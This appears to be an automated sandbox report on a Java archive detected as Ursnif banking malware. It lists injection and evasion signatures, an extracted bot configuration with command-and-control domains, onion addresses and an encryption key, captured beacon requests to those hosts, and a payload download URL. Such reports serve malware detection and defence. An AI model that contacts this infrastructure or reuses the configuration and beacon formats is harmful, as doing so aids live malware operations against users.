Windows Analysis Report wuxvGLNrxG.jar

Overview

General Information

Sample Name:	wuxvGLNrxG.jar
Analysis ID:	458767
MD5:	62f16f566ecdf99cfc14e82dadf0f18e
SHA1:	9b1dee428b273fe00921b43821fd5deeadf9dd30
SHA256:	04b9398217671d5282716edd773af60c3a57765b679214aa65a04f2565437190
Tags:	Gozijar
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Sigma detected: Encoded IEX

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Ursnif

Allocates memory in foreign processes

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Drops PE files to the user root directory

Exploit detected, runtime environment dropped PE file

Exploit detected, runtime environment starts unknown processes

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Regsvr32 Command Line Without DLL

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://gtr.antoinfer.com/	Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/vADDezNeSke9U/kvoRl9HX/wg75j_2F1ccwy_2BN_2FgkC/Yh7aCXFF09/ee6kz01isjr6jdjmu/pk1iZnzuGks_/2FuxytqUYce/a5iWzRhuhKAZ4y/D3pXNK4fyJfK_2FkQ5xOt/JVfaKqEHewQX_2Bv/e8GLEmqyRCDOz2z/IZT7WGXdb3gbjuggsB/nJqV1sh4i/1CBsNlHce4vH9r545Rqj/lW_2BT5w8VeL3I13xEE/kQKMsI_2FV_2BAmRAPTTX_/2Fpo46_2FxhKi/aU1VyuXn/ftd9GHd_2FR3UMOYr1sC0hP/YgHDHBl7oA/36ctrYN2Q45zT_2FE/cFBpdxQOL4tl/xsOclWLyg_2B/TAMc8	Avira URL Cloud: Label: malware
Source: http://app.flashgameo.at/3RCQ0msRVVnLSJ5u/TSJ_2Fxz80keoop/a7EjDDG7wrXHG68ZtX/Pmtf7IzJN/aJqNiYsKzCerz7CxDBe7/e24yGD4QU8YxhhSD3YO/03mvbgBdqeCIW6TNLEFcOV/EK49ihmFywAO1/pIF7jejl/dujcubamjFalP53t_2FHK8B/KFSEJwMt_2/BtevMf85tQFfIELR_/2BcnIXZSnbYO/KZzJGKYFtQN/vyvR7VHvQcMFD4/kY1tU9entnPFjHGBpC6PC/rfEItxXtG1ipdjW8/L_2BLpkqRSBRNu3/Qm7zxsLhdRlaAq032b/I1k1iSuisV_2F/6	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000006.00000002.908239339.00000000059D0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "XIQ66Sm6I98pcZAgIrZV1QfUYCowoyPvAE0ZGoUgS6LRMgPUz1CjzrhYfIXNK4I/5IuxCPvsPosYMGmpJAGwuiufC5ilxlpxNXjOvZf/072uMnV3R8Omqvlr+TUeswWBriIAFZY/aSr0j7JV6iJrVfwOKuYBzEzn95xd7jqdIO1IDtgQOe1zk9B/od2PHQ4N5H6FvG+U4i9V8MADwHONlD1brINCCdaaC2W6Qp9XxRnFqMgRJ11Iryex4VSd5uE7o6/Nj6obfRxYgX/9kpKybm15Tv3BHBp9AFun5vwEIvKQiP6MHnUYchwnFuWqwNNwMjcVV+KXsy8CJKXx/Cr9tXrtx3Y8jox8xHMgA2vPxVE=", "c2_domain": ["app.flashgameo.at", "apr.intoolkom.at", "r23cirt55ysvtdvl.onion", "gtk5.variyan.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "free.monotreener.com", "sam.notlaren.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "10", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Multi AV Scanner detection for domain / URL

Source: gtr.antoinfer.com	Virustotal: Detection: 12%	Perma Link
Source: app.flashgameo.at	Virustotal: Detection: 11%	Perma Link
Source: http://gtr.antoinfer.com/	Virustotal: Detection: 12%	Perma Link

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_04804CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

6_2_04804CEA

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000006.00000003.847587906.0000000005EB0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000006.00000003.847587906.0000000005EB0000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059E9386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	6_2_059E9386
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059F0F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	6_2_059F0F53
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059DCA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	6_2_059DCA40

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49753 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49753 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49758 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49758 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49769 -> 185.228.233.17:80

Source: global traffic	HTTP traffic detected: GET /vADDezNeSke9U/kvoRl9HX/wg75j_2F1ccwy_2BN_2FgkC/Yh7aCXFF09/ee6kz01isjr6jdjmu/pk1iZnzuGks_/2FuxytqUYce/a5iWzRhuhKAZ4y/D3pXNK4fyJfK_2FkQ5xOt/JVfaKqEHewQX_2Bv/e8GLEmqyRCDOz2z/IZT7WGXdb3gbjuggsB/nJqV1sh4i/1CBsNlHce4vH9r545Rqj/lW_2BT5w8VeL3I13xEE/kQKMsI_2FV_2BAmRAPTTX_/2Fpo46_2FxhKi/aU1VyuXn/ftd9GHd_2FR3UMOYr1sC0hP/YgHDHBl7oA/36ctrYN2Q45zT_2FE/cFBpdxQOL4tl/xsOclWLyg_2B/TAMc8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /dXpECetHmgl/jZ5QgO4VQ5n7Ya/5WG13zv8FsJ7UHAsRzG6o/tuegNb0pKsze1q8m/BFFIoL94oqS3Xy5/2CToYSpB16eSrFtnci/JJpXY6SoH/XreQV46sDPFSsCAJouM2/iHzQUSNMgnJTx55cx3j/MmD3WJXN0HitAsfKYCeS4U/XB8OV1ES5hgCL/nWK1edkO/6qSdyyCugRUjkT1qUOwiCJM/MSiEk138SJ/G1KsZOq03kjmLCLGC/NzwAp9ygsqyP/bGVSLslr6gZ/4vPMzV84dL2DnK/e0EHovLyDjUS4tMV2PpnW/3kIAg9cwvfdjiTOv/CiQZ3QXkz/m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /237SFcpksL4/7t6llgwWKHmgXp/Q2Om3V7R9P_2BuKwtoBIy/oC3CbdFwoQnO6JXh/oc6axuJmX23HUBQ/N9JcFQDYfZy78xvHdV/Eyu9m3Jwu/vUXfdXXDOpS4qZwZ1V_2/BSzAi4G_2FRJBE9rTzz/lwDEwtsr5SkOway_2FYxPW/GKtqxZardIX_2/F7n7Mkff/zDJ3oI_2FajJGaPVcNFN7vs/1BECSBbaIB/rrP9deBYJAG4Fk9M6/a_2BTn0LDVG_/2BBX_2FrWpo/pKkEfGSjWVOaOG/qDPRic7EtQbS4qL93dRJc/ok0io5QLdQbD64kK/puYTwXgTqGaug8_/2BsYJ7O9A4si/2Us HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic	HTTP traffic detected: GET /3RCQ0msRVVnLSJ5u/TSJ_2Fxz80keoop/a7EjDDG7wrXHG68ZtX/Pmtf7IzJN/aJqNiYsKzCerz7CxDBe7/e24yGD4QU8YxhhSD3YO/03mvbgBdqeCIW6TNLEFcOV/EK49ihmFywAO1/pIF7jejl/dujcubamjFalP53t_2FHK8B/KFSEJwMt_2/BtevMf85tQFfIELR_/2BcnIXZSnbYO/KZzJGKYFtQN/vyvR7VHvQcMFD4/kY1tU9entnPFjHGBpC6PC/rfEItxXtG1ipdjW8/L_2BLpkqRSBRNu3/Qm7zxsLhdRlaAq032b/I1k1iSuisV_2F/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: global traffic	HTTP traffic detected: POST /G2C5F00UJRPr4lWW7B/KlWiTxKGE/iBy2NwQRn_2FNqzxZ1SA/nnE6YBk_2FwTOtspunD/n0UU9l81b89vLLjfE3p3Uj/fQlNYlt8jzQNi/5Aw7M_2B/jzrU9Vt5vqUzfxxfb3VGot6/F2UkBoVtFI/sgNG1F2NjkLSSATKg/wDR_2BZFPhI7/vp1xCK4JdVa/NiJS8onshLMtMr/NpAvU_2FiIExiKFqlV2JG/bCzcZcTt0hxiJXde/s362REIbjP_2FK0/_2BWX7D7GQK_2BIZhO/xh6DcQaPA/4HTHkvZP1iB2rEwgLd5L/yeSlsG_2FzPkt/lYPXp0wz/t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at

Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: java.exe, 00000002.00000002.686346145.0000000009BC5000.00000004.00000001.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.orgk
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.orgK
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: regsvr32.exe, 00000006.00000003.788708194.0000000002E9C000.00000004.00000001.sdmp	String found in binary or memory: http://gtr.antoinfer.com/
Source: regsvr32.exe, 00000006.00000003.788671211.0000000002E92000.00000004.00000001.sdmp	String found in binary or memory: http://gtr.antoinfer.com/237SFcpksL4/7t6llgwWKHmgXp/Q2Om3V7R9P_2BuKwtoBIy/oC3CbdFwoQnO6JXh/oc6axuJmX
Source: regsvr32.exe, 00000006.00000003.770611799.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: http://gtr.antoinfer.com/dXpECetHmgl/jZ5QgO4VQ5n7Ya/5WG13zv8FsJ7UHAsRzG6o/tuegNb0pKsze1q8m/BFFIoL94o
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: java.exe, 00000002.00000002.686399629.0000000009BD5000.00000004.00000001.sdmp	String found in binary or memory: http://java.oracle.com/
Source: java.exe, 00000002.00000002.692030098.000000001535C000.00000004.00000001.sdmp, java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp, java.exe, 00000002.00000003.676737804.0000000014BE0000.00000004.00000001.sdmp	String found in binary or memory: http://null.oracle.com/
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/07
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/;
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.orgC
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp	String found in binary or memory: http://x1.c.lencr.org/
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/k
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp, java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: https://data.green-iraq.com/app.dll
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729

Source: Yara match	File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_04801ADF GetProcAddress,NtCreateSection,memset,	6_2_04801ADF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_048025E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	6_2_048025E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_04804F6E NtMapViewOfSection,	6_2_04804F6E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_04808055 NtQueryVirtualMemory,	6_2_04808055
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059F25B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	6_2_059F25B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059E51A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	6_2_059E51A4
